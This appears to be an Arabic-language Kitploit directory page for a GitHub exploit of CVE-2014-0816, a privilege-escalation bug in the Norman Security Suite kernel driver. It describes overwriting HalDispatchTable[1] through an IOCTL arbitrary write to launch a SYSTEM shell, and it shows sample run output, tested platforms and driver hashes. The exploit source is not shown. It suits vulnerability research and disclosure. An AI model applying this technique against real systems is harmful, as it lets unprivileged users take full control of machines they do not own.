Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2014-0816 — CVE-2014-0816 | Kitploit
أدوات/GitHubGitHub/tandasat/cve-2014-0816
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال الملفات الثنائية
GitHubtandasat/cve-2014-0816

CVE-2014-0816

CVE-2014-0816

عرض المستودع
2510منذ 9 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2014-0816

هذا استغلال لـ CVE-2014-0816 (JVNDB-2014-000026: Norman Security Suite معرّضة لثغرة رفع الامتيازات).

يستغل هذا الاستغلال ثغرة في معالج IOCTL في ngs.sys / ngs64.sys لتشغيل CMD.exe بصلاحيات SYSTEM من صلاحية غير مدير (Non-Administrator).

الاستخدام

root@kitploit:~
C:\Users\user\Desktop> exploit_ngs.exe
[*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
[*] Target file version: ver 5.0.740.0.
[*] An address file was created at C:\Users\user\Desktop\address.bin.
[*] Shellcode is located at 000000013F9357D0.
[*] The device was opened as 0000000000000044.
[*] The address file was opened as FFFFFFFF80000558.
[+] HalDispatchTable[1] is located at FFFFF800033FDC68.
[+] HalDispatchTable[1] was altered.
[+] Shellcode was executed.
[+] The SYSTEM shell was launched.
[*] Press any key to finish this program.

بعدها ستظهر وحدة تحكم جديدة.

root@kitploit:~
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>whoami
nt authority\system

تسمح الثغرة للمهاجم بالكتابة فوق أي عنوان بأي قيمة، لذلك يغيّر هذا الاستغلال قيمة HalDispatchTable[1] إلى عنوان شيفرة shellcode يرفع امتيازات العملية الحالية إلى امتيازات SYSTEM.

demo_win7_x64

هذه الثغرة قابلة للاستغلال على جميع المنصات من Windows XP إلى 8 لكل من x86/x64، لكن هذا الاستغلال مصمم ومُختبر على منصات معينة (على سبيل المثال، لن يعمل على Windows 8 بسبب SMEP).

المنصات المختبرة

  • Norman Security Suite 10.1
  • 2ad60239e6637132fcaa816348c6ec3b358db49e (ngs.sys)
  • 21da5771db8308292c9d88a16b73260be40f0b09 (ngs.sys)
  • d2e34871d4d0fe04087e89f9c9f3599193b8258a (ngs64.sys)
  • fa1ed5997466263c8f91d8a4f3a80e3712cf777e (ngs64.sys)
  • Windows XP (x86) SP3 مع صلاحية Guest
  • Windows 7 (x86/x64) SP1 مع صلاحية Guest
  • Windows 10 (x64) Build 14393 مع صلاحية Guest (مع تعطيل SMEP)

الترخيص

تم إصدار هذا البرنامج بموجب رخصة MIT، انظر LICENSE.

تنزيل الأداة